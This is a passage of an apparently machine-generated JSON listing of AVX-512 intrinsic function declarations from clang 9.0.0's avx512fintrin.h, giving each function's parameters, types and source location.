"type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_and_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:647:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_and_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:653:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__src", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__k", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_and_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:661:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__k", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_andnot_si512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:668:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_andnot_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:674:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_andnot_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:680:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_andnot_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:688:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_andnot_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:695:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_andnot_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:701:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_andnot_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:709:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_or_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:716:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_or_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:722:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__src", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__k", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_or_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:730:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__k", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_or_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:736:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_or_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:742:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__src", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__k", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_or_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:750:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__k", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_xor_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:756:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_xor_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:762:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__src", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__k", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_xor_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:770:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__k", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_xor_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:776:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_xor_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:782:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__src", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__k", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_xor_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:790:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__k", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_and_si512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:796:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_or_si512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:802:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_xor_si512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:808:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_add_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:816:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_add_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:822:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mul_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:828:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mul_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:834:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_sub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:840:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_sub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:846:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_add_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:852:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_add_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:858:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_add_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:866:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_sub_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:874:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_sub_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:880:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_sub_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:888:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_add_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:896:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_add_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:902:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_add_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:910:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_sub_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:918:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_sub_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:924:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_sub_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:932:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_max_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:954:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_max_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:961:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_max_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:969:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_max_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:991:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_max_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:998:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_max_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1006:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm_mask_max_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1014:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_max_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1023:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_max_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1050:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_max_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1059:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm512_max_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1087:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_max_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1093:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_max_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1101:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_max_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1109:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_max_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1115:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_max_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1123:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_max_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1131:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_max_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1137:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_max_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1145:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_max_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1153:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_max_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1159:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_max_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1167:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_min_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1189:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_min_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1196:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_min_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1204:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_min_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1226:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_min_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:1233:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { 